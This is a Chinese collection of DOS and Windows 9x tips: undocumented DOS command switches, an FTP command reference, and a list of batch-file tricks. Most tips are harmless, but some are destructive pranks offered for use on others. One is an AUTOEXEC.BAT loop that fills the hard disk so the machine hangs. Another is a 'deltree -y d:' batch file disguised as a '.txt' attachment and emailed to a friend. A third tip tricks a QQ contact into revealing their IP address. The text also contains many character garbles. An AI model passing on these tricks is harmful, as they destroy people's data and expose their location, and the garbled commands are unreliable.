重写硬盘主引导记录。注意:如果硬盘分区超过四个,不能用此命令,因储存额外分区信息的区域,会被FDISK/MBR覆盖。(初学者千万不要用)
3.SHELL=C:\COMMAND.COM/P/F
加上/F参数后,提示“Abort,Retry,Fail”出错信息时,将以Fail作为默认选项。
4.COMMAND/F
在命令行执行时,使Fail作为“Abort,Retry,Ignore,Fail”出错信息提示的默认选项,直至重新启动。在其它专用DOS外壳(如NDOS、4DOS等)或应用程序(如PCTOOLS、CCED等) 的DOS外壳中执行此命令后,将返回并停留在MS-DOS外壳,须执行EXIT才能回到第二外壳。
5.COMMAND/P
在命令行执行时,重新运行AUTOEXEC.BAT。如在其它DOS外壳中执行此命令,会回到MS-DOS外壳而不能重新返回第二外壳。
6.COMMAND/D
在命令行执行时,阻止运行自动批处理文件。在其它DOS外壳中运行的情况,与COMMAND/F相同,但不将Fail设为默认选项。
7.VER/R
显示更多信息。例如,执行VER,显示“MS-DOS Version 6.22”,加参数/R后,则显示:MS-DOS Version 6.22 Revision A DOS is in HMA
8.FORMAT/AUTOTEST
自动检查磁盘格式,然后完成格式化全过程,再回到DOS提示符。
9.FORMAT/BACKUP
除提示用户输入卷标外,与上面相同。
10.FORMAT/SELECT
只在磁盘上备份系统区数据,相当于执行MIRROR程序,不进行格式化。
11.FORMAT/SELECT/U
不进行格式化,只将引导区和文件分配表用F6H填之。虽不触动根目录区与数据区,但磁盘因此不可访问。这似乎是为防止数据泄密提供一个应急手段。(初学者千万不要用)
12.IF EXIST EMMXXXXO
命令名用于批文件,可检测内存中是否有EMM386.EXE。命令语句举例:“if not exist EMMXX XXO echo EMM386.EXE is not installed!”。
13.IF EXIST XMMXXXXO
命令名可在批文件中检测内存中是否装有HIMEM.SYS。命令行可以是:“if not exist XMMXXX XO echo HIMEM.SYS is not in memory!”。
14.COPY . A:
用“.”来代替“*.*”,也可用于DEL等命令。
15.INSTALLHIGH
有些设备驱动程序需在CONFIG.SYS中用INSTALL语句安装,只能装入常规内存,而且用MEMMAKER优化内存时,并不对INSTALL语句进行处理。可改用INSTALLHIGH将这类设备驱动程 序装入上位内存,例:INSTALLHIGH=C:\DOS\SHARE.EXE。
16.用“:”来代替“REM”
在DOS执行批文件时,碰到“REM”语句时,先将全句读入,然后再根据句首是否有REM,决定处理方法;而碰到以“:”开始的标号,只要第二个字符不是字母或数字,即视为无效标号而立刻跳到下一行。因此,可用“:”加一空格来引导注释行,以增加批文件执行速度
Ftp命令使用大全
-v 显示远程服务器的所有响应信息;
-n 限制ftp的自动登录,即不使用;
.n etrc文件;
-d 使用调试方式;
-g 取消全局文件名。
ftp使用的内部命令如下(中括号表示可选项):
1、![cmd[args]:在本地机中执行交互sh\*ll,exit回到ftp环境,如:!ls*.zip。
2、$ macro-ame[args]:执行宏定义macro-name。
3、account[password]:提供登录远程系统成功后访问系统资源所需的补充口令。
4、append local-file[remote-file]:将本地文件追加到远程系统主机,若未指定远程系统文件名,则使用本地文件名。
5、ascii:使用ascii类型传输方式。
6、bell:每个命令执行完毕后计算机响铃一次。
7、bin:使用二进制文件传输方式。
8、bye:退出ftp会话过程。
9、case:在使用mget时,将远程主机文件名中的大写转为小写字母。
10、cd remote-dir:进入远程主机目录。
11、cdup:进入远程主机目录的父目录。
12、chmod mode file-name:将远程主机文件file-name的存取方式设置为mode,如:chmod 777 a.out。
13、close:中断与远程服务器的ftp会话(与open对应)。
14、cr:使用asscii方式传输文件时,将回车换行转换为回行。
15、delete remote-file:删除远程主机文件。
16、debug[debug-values]:设置调试方式,显示发送至远程主机的每条命令,如: deb up 3,若设为0,表示取消debug。
17、dir[remote-dir][local-file]:显示远程主机目录,并将结果存入本地文件local-file。
18、disconnection:同close。
19、form format:将文件传输方式设置为format,缺省为file方式。
20、get remote-file[local-file]:将远程主机的文件remote-file传至本地硬盘的local-file。
21、glob:设置mdelete、mget、mput的文件名扩展,缺省时不扩展文件名,同命令行的-g参数。
22、hash:每传输1024字节,显示一个hash符号(#)。
23、help[cmd]:显示ftp内部命令cmd的帮助信息,如:help get。
24、idle[seconds]:将远程服务器的休眠计时器设为[seconds]秒。
25、image:设置二进制传输方式(同binary)。
26、lcd[dir]:将本地工作目录切换至dir。
27、ls[remote-dir][local-file]:显示远程目录remote-dir,并存入本地文件local-file。
28、macdef macro-name:定义一个宏,遇到macdef下的空行时,宏定义结束。
29、mdelete[remote-file]:删除远程主机文件。
30、mdir remote-files local-file:与dir类似,但可指定多个远程文件,如:mdir *.o.*.zipoutfile。
31、mget remote-files:传输多个远程文件。
32、mkdir dir-name:在远程主机中建一目录。
33、mls remote-file local-file:同nlist,但可指定多个文件名。
34、mode[modename]:将文件传输方式设置为modename,缺省为stream方式。
35、modtime file-name:显示远程主机文件的最后修改时间。
36、mput local-file:将多个文件传输至远程主机。
37、newer file-name: 如果远程机中file-name的修改时间比本地硬盘同名文件的时间更近,则重传该文件。
38、nlist[remote-dir][local-file]:显示远程主机目录的文件清单,并存入本地硬盘的local-file。
39、nmap[inpattern outpattern]:设置文件名映射机制,使得文件传输时,文件中的某些字符相互转换,如:nmap $1.$2.$3&1,$2;.&2,$3;,则传输文件a1.a2.a3时,文件名变为a1,a2。该命令特别适用于远程主机为非UNIX机的情况。
40、ntrans[inchars[outchars]:设置文件名字符的翻译机制,如ntrans 1R,则文件名LLL将变为RRR。
41、open host[port]:建立指定ftp服务器连接,可指定连接端口。
42、passive:进入被动传输方式。
43、prompt:设置多个文件传输时的交互提示。
44、proxy ftp-cmd:在次要控制连接中,执行一条ftp命令,该命令允许连接两个ftp服务器,以在两个服务器间传输文件。第一条ftp命令必须为open,以首先建立两个服务器间的连接。
45、put local-file[remote-file]:将本地文件local-file传送至远程主机。
46、pwd:显示远程主机的当前工作目录。
47、quit:同bye,退出ftp会话。
48、quote arg1,arg2...:将参数逐字发至远程ftp服务器,如: quote syst。
49、recv remote-file[local-file]:同get。
50、reget remote-file[local-file]:类似于get,但若local-file存在,则从上次传输中断处续传。
51、rhelp[cmd-name]:请求获得远程主机的帮助。
52、rstatus[file-name]:若未指定文件名,则显示远程主机的状态,否则显示文件状态。
53、rename文章出处:bbs.nju.edu.cn[to]:更改远程主机文件名。
54、reset:清除回答队列。
55、restart marker:从指定的标志marker处,重新开始get或put,如:restart 130。
56、rmdir dir-name:删除远程主机目录。
57、runique:设置文件名唯一性存储,若文件存在,则在原文件后加后缀 .1,.2等。
58、send local-file[remote-file]:同put。
59、sendport:设置PORT命令的使用。
60、site arg1,arg2...:将参数作为SITE命令逐字发送至远程ftp主机。
61、size file-name:显示远程主机文件大小,如:site idle 7200。
62、status:显示当前ftp状态。
63、struct[struct-name]:将文件传输结构设置为struct-name, 缺省时使用stream结构。
64、sunique:将远程主机文件名存储设置为唯一(与runique对应)。
65、system:显示远程主机的操作系统类型。
66、tenex:将文件传输类型设置为TENEX机的所需的类型。
67、tick:设置传输时的字节计数器。
68、trace:设置包跟踪。
69、type[type-name]:设置文件传输类型为type-name,缺省为ascii,如:type binary,设置二进制传输方式。
70、umask[newmask]:将远程服务器的缺省umask设置为newmask,如:umask 3。
71、user user-name[password][account]:向远程主机表明自己的身份,需要口令时,必须输入口令,如:user anonymous my@email。
72、verbose:同命令行的-v参数,即设置详尽报告方式,ftp服务器的所有响应都将显示给用户,缺省为on。
73、?[cmd]:同help。
DOS利用全接触
______________________________________________
一、给非法用户设置个小陷阱︳︳︳︳︳︳︳︳︳︳︳
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
在Windows目录中建立一个winstart.bat文件(如果已经存在该文件,则按如下所示修改其内容),并在该文件中加入以下几行命令:
@echooff
choice/c:&/n/3
上面代码中的“&”为我们设置的密码,可以自行设置。这样,在启动Windows时系统将要求你输入密码,表现在屏幕上就是光标一闪一闪的,造成非法用户以为Windows死机的假像,有时,就连部分高手也会上当受骗。当我们要进入系统时,只要输入“&”即可
______________________________________________
二、用“魔咒”跟电脑开个玩笑︳︳︳︳︳︳︳︳︳︳
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
怎样让电脑死机呢?当然有很多方法,这里介绍一种非常简单的方法。打开C盘根目录下的Autoexec.bat文件(如果不存在,可以自行建立),然后将其中的内容全部删除,输入下面两行命令:
@cd>>notepad
@%0
然后保存就可以了。解释一下上面的命令:
“@”符号表示在DOS下不显示后面的命令,这样就可以把危险指令掩藏起来,来个神不知鬼不觉。“cd>>notepad’就是把当前的目录拷贝成一个名为notepad的文件,“>>”表示保存到,和“>”不同的是,“>>”会将保存结果加到文件的最后,而“>”是覆盖的意思。所以,用“>>”的结果就是保存的文件越来越大!“%0”的意思是不断地重复上面一条指令,其结果就是名为notepad的文件会越来越大,直到填满整个硬盘,此时,你的电脑就只有死机一条路可以走了。如果你重新启动电脑,只会看到;Starting MS-DOS...之后就会死机了,而且期间会不接受任何指令。要去掉这条“魔咒”,只要用软盘启动电脑,或跳过Autoexec.bat文件的执行,再把上面的指令去掉就行了。
______________________________________________
三、在DOS下解锁注册表编辑器︳︳︳︳︳︳︳︳︳︳︳
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
大家知道,注册表编辑器被禁用后很是棘手,特别是reg文件打开方式被更改后,就无法通过导入reg文件来解锁注册表了。不过,在DOS下我们也可以给注册表解锁,具体方法是:在纯DOS下,输入如下命令:REGEDIT/DHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools。回车,会出现一个标题栏为“注册表编辑器”的对话框,里面写着“,确实要把HKEY_CURRENT_USER\......DisableRegistryTools内的信息添加到注册表吗?”点击“确定”即可。浏览恶意网页导致注册表被禁用后,不妨试试本方法。
______________________________________________
四、用Doskey命令“封杀”format︳︳︳︳︳︳︳︳︳
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
对格式化程序~rmat命令大家一定很害怕吧?某些病毒一侵入,就给你的硬盘来个格式化,后悔都来不及,只得重装系统,不仅麻烦,而且资料不保!现在你不必害怕了,在DOS下键入如下命令:C:\doskeyFORMAT=BadCommandOrfilename!回车,就将format命令给“封杀”了,当病毒或恶意程序格式化你的硬盘时,系统将会显示:BadcommandOrfilename!如果你自己想格式化,怎么办呢?可以在DOS下键入如下命令:C:\doskeyFORMAT=,然后回车就可以了。注:Doskey为DOS提供的锁定命令。
______________________________________________
五、在DOS下检查是否中木马︳︳︳︳︳︳︳︳︳︳︳︳
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
一般说来,中了木马的机器会开有特定的端口。一般一台个人用的Win9x系统在开机后最多只有137、138、139这3个端口(若上网冲浪会有其他端口,这是本机与网上主机通讯时打开的,如IE会打开1025、1026、1027……,QQ会打开4000、4001……)。由于Netstat命令是通过读取内存中的“kernelroutingtables”来获得网络信息,所以用它来发现一般的木马还是很容易的。在DOS命令行下用netstat-na命令可以看到本机所有打开的连接,如:
C:\WINDOWS>nelstat-na
ActiveCofmectiogs
ProtoLocalAddressForeignAddressState
TCPXXX.XXX.XXX.XXX:1370.0.0.0:0LISTENING
TCPXXX.XXX.XXX.XXX:1380.0.0.0:0LISTENING
TCPXXX.XXX.XXX.XXX:1390.0.0.0:0LISTENING
UDPXXX.XXX.XXX.XXX:137*:*
UDPXXX.XXX.XXX.XXX:138*:*
发现有其他端口打开的话就要查查看子,你很有可能中木马了。怎么样?在DOS下也可以检查是否中木马了,很棒吧!
______________________________________________
六、在DOS下打开IE的“Inlernet属性”窗口︳︳︳︳︳
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
有时在浏览了某些恶意网页后,会导致IE的“Internet属性”对话框无法打开,这时我们可以在DOS窗口下输入:RunDll32.exeshell32.dll,ControlRunDLLinetcpl.cpl命令,就可打开IE的“Internet属性”对话框。要注意“ControlRunDLL”的大小写以及它前面的逗号(,)不要忘记了。
______________________________________________
七、在DOS下使用注册表编辑器︳︳︳︳︳︳︳︳︳︳︳
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
注册表编辑器Regedit.exe其实是一个双栖型的程序,即可在Windows下运行,也可在DOS下运行。许多用户可能已经知道在Windows下使用Regedit的方法,那么在DOS下如何使用注册表编辑器呢?
在DOS提示符下键入Regedit命令,将出现一个帮助屏幕。此屏幕给出了其命令行参数及其使用方法。
语法:
Regedit[/L:system][/R:user]filenamel
Regedit[/L:system][/R:user]/Cfilename2
Regedit[/L:system][/R:userl/Efilename3
[regpath]
其中;
/L:system指定system.dat文件的存放位置。
/L:user指定user.dat文件的存放位置。
filenamel指定引入注册表数据库的文件名。
/Cfilename2指定形成注册表数据库的文件名。参数“/C”表示从后面指定的文件中重新生成整个注册表。重建的注册表文件往往比原来的小l/5到1/3,从而达到了优化的目的。
/Efilename3指定导出注册表文件的文件名。
regpath指定导出注册表文件的开始关键字(缺省为全部关键字)
现举几个例子说明regedit.exe在DOS下的使用方法。
[例1]将注册表导出到reg1.reg文件中。
regedit/Ereg1.reg
[例2]重新生成注册表reg1.reg。
regedit/Creg1.reg
[例3]将reg.dat导人系统注册表数据库中。
regeditreg.dat
[例4]将CLK开始的关键字导出注册表数据库,并命名为clk.reg。
regedit/Eclk.regclk
[例5]指定system.dat存放在D:\PIN中,将user.dat存放在E:\PWIN中,将reg.dat数据文件形成一个新的注册表数据库。
regecht/L:D:\PWIN/R:E:\PWIN/Creg.Dat
______________________________________________
八、用DOS命令查QQ好友的IP地址︳︳︳︳︳︳︳︳︳︳
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
查QQ好友的IP地址还用得着这么麻烦吗?给QQ打个补丁不就行了吗?不错,这样做是很简单,但如果是新出的QQ,“补丁”还没有做出来,又该怎么办呢?为什么不试试DOS命令呢?即简单,又方便。
首先,用甜言蜜语、糖衣炮弹之类的武器把你想知道IP地址的那个人“请”到QQ的“二人世界”里。接着,我们在DOS窗口(Win9x下叫DOS,Win2000下叫命令提示符),输入如下命令:netstat-n
你将看到:
ActiveConnection
PhotoLocalAddressForeignAddressState
TCP202.109.34.78:1200202.121.139.35:61555ESTABLISHED
TCP202.109.34.78:2694202.109.72.40:6667ESTABLISHED
TCP202.109.34.78:4869211.202.1.227:23ESTABLISHED
好家伙,这么多IP!那个才是我们要找的呢?别着急,往后看。我们现在推出“二人世界”,然后在DOS下再输入一次:netstat-n
你将看到:
ActiveConnection
PhotoLocalAddressForeignAddressState
TCP202.109.34.78:1200202.121.139.35:61555TIME_WAIT
TCP202.109.34.78:2694202.109.72.40:6667ESTABLISHED
TCP202.109.34.78:4869211.202.1.227:23ESTABLISHED
看出前后两次的区别了么?没有看出来?仔细看看,你会发现的。现在你知道了吧?对!和你聊天的人的IP就是202.121.139.35!你是怎么知道的呢?我们在“二人世界”中要传送消息,相互之间必然要通过UDP协议产生连接,此时自然是ESTABLISHED了;而退出“二人世界”连接要断开,自然就是TIME_WAIT了。
______________________________________________
九、自动加载防火墙︳︳︳︳︳︳︳︳︳︳︳︳︳︳︳
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
有些朋友在上网时常忘记运行防火墙,病毒或木马之类的程序就有可能乘虚而入!但是,如果每次启动WINDOWS都自动启动防火墙,由于不是每次开机都上网,因此有浪费系统资源之嫌。那么,有没有两全其美的方法呢?
由于我们上网往往要发电子邮件,因此,如果能在收发邮件时自动打开防火墙,不就解决了这个问题么?下面以天网防火墙和OUTLOOKEXPRESS为例,说说如何在邮件客户端运行之前打开防火墙。
首先新建一个文本文件,在其中输入以下内容:
STARTC:\PROGRA~1\SKYNET\FIREWALL\SNFW.EXE
STARTC:\PROGRA~1\OUTLOO~1,EXE\MSIMN.EXE
然后另存为GO.BAT即可(名字随便起,只要是后缀为BAT就可以了)。由于OUTLOOKEXPRESS默认设置为启动时发送和接受邮件,只要我们执行GO.BAT,他就会自动启动天网防火墙,接着就会启动OE,OE就会连线上网,如此达到了上网即可打开防火墙的目的。这里需要指出的是:DOS下不支持长文件名,最多8个字符,所以ProgramFiles应写成Progra~!,命令格式即为“start文件存放路径”。
______________________________________________
十、删除不必要的文件︳︳︳︳︳︳︳︳︳︳︳︳︳︳
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
在Windows下保存着许多我们并个需要的文件,如Temp目录和Rcenet目录下的文件,回收站中的文件以及IE的历史记录和Cookie等丈仆,如果手工来清除它们实在是太麻烦了,我们可以在Autoexec.bat中加入一些内容,使得每次启动Windows时就删除这些文件,这样就省事多了!用记事本打开C:\Autoexec.bat文件,编辑内容如下:
EchoY
ifexistc:\windows\temp\*.*delc:\windows\temp\*.*>nul
ifexistc:\windows\Tempor~1\*.*delc:\windows\Tempor~1\*.*>nul
ifexistc:\windows\History\*.*delc:\windows\History\*.*>nul
ifexistc:\windows\recent\*.*delc:\windows\recent\*.*>nul
ifexistc:\windows\cookies\*.*delc:\windows\cookies\*.*>nul
此批处理第二行为删除临时文件夹的内容;第三、四行为删除IE浏览器打开网页后遗留下的内容;第五行为删除“开始”→“文档”中的内容;第六行为删除回收站里的内容;第六行为删除Cookies。
______________________________________________
十一、更改指定文件的日期︳︳︳︳︳︳︳︳︳︳︳︳
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
要修改名为XXX.exe(任意exe文件)的日期,可以在MS-DOS方式下键入copyXXX.exe+,,(注:加号后紧跟2个逗号),系统询问时键入“Y”,即将文件更改为当前日期。
______________________________________________
十二、恢复在DOS下删除的文件︳︳︳︳︳︳︳︳︳︳︳
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
Windows98的回收站只能恢复在Windows里删除的内容,用以下方法可恢复Windows98的DOS模式下删除的文件:先运行“Lock”命令,解除WindOWS对磁盘访问的限制,再使用命令“UnDelete”恢复。或重新启动进入DOS,运行“UnDelete”也行,不过动作要快,否则被其他新建文件覆盖了就没有办法了。
______________________________________________
十三、在DOS下制作启动盘︳︳︳︳︳︳︳︳︳︳︳︳︳
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
当Windows98系统崩溃而你又不得不重装系统的时候,如果伯;以前忘了制作启动盘,那么不要着急,这时还可以在DOS环境下制作。具体方法是:运行Windows目录下的Command文件夹中的一个名为Bootdisk的批处理文件。运行后出现下列信息:
Pleasespecifythedriveletterofyourfloopydrive.
PresslforAOr
Press2forB:
Chooseanoption[1,2]?
一般都选择1,之后屏幕会出现—些英文信息。放入一张磁盘后,按回车,…张启动盘很快就制作成了。
______________________________________________
十四、DOS中的注册表修理命令︳︳︳︳︳︳︳︳︳︳︳
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
在DOS状态下,输入命令行“Scanreg/fix,系统会对当前的注册表进行修复,如果你觉得系统有些不正常,试试这个命令吧,也许能解决问题。
______________________________________________
十五、和朋友开个玩笑︳︳︳︳︳︳︳︳︳︳︳︳︳︳
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
这是个危险的游戏,切记:只有真心想让朋友痛揍一顿的人才可以使用!
用记事本编辑一个文本文件,里面只有一句:
deltree-yd:\*.*,然后另存为“我的文章.txt.bat’
用E-mail附件发送给他。由于Windows支持双后缀名,这样,
在你的朋友看来这个文件就是:我的文章.txt。
谁又知道这是个批处理文件呢?如果他双击这篇所谓的“文章”,
那他D盘下的文件就不保了。防范方法:不要随便打开附件,如果实在想看,一定要用记事本打开。将系统中的危险命令删除或改名。另外,让系统能显示双重扩展名,在“资源管理器”中点击“查看(v)”→“文件夹选项”→“查看”,将“隐藏已知文件类型的扩展名”前面的“√”去掉。
再次声明:这样做是很危险的!虽然这算不上病毒,但它们的危害有时比病毒还要大